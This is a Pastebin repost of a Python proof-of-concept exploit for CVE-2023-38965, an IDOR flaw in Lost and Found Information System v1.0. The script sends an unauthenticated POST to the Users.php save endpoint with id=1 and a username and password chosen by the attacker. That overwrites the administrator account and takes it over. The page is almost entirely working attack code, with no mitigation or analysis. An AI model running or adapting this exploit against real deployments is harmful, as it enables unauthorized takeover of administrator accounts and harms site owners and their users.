Advertisement
FlyFar

Lost and Found Information System v1.0 - ( IDOR ) leads to Account Take over - CVE-2023-38965

Feb 14th, 2024
1,556
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 0.98 KB | Cybersecurity | 0 0
  1. # Exploit Title: Lost and Found Information System v1.0 - idor leads to Account Take over
  2. # Date: 2023-07-16
  3. # Exploit Author: OR4NG.M4N
  4. # Category : webapps
  5. # Tested on: Windows/Linux
  6.  
  7. Python p0c :
  8.  
  9. import argparse
  10. import requests
  11. import time
  12. parser = argparse.ArgumentParser(description='Send a POST request to the target server')
  13. parser.add_argument('-url', help='URL of the target', required=True)
  14. parser.add_argument('-user', help='Username', required=True)
  15. parser.add_argument('-password', help='Password', required=True)
  16. args = parser.parse_args()
  17.  
  18.  
  19. url = args.url + '/classes/Users.php?f=save'
  20.  
  21.  
  22. data = {
  23.     'id': '1',
  24.     'firstname': 'Az7rb',
  25.     'middlename': '',
  26.     'lastname': 'Admin',
  27.     'username': args.user,
  28.     'password': args.password
  29. }
  30.  
  31. response = requests.post(url, data)
  32. if b"1" in response.content:
  33.     print("Exploit ..")
  34.     time.sleep(1)
  35.     print("User :" + args.user + "\nPassword :" + args.password)
  36. else:
  37.     print("Exploit Failed..")
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement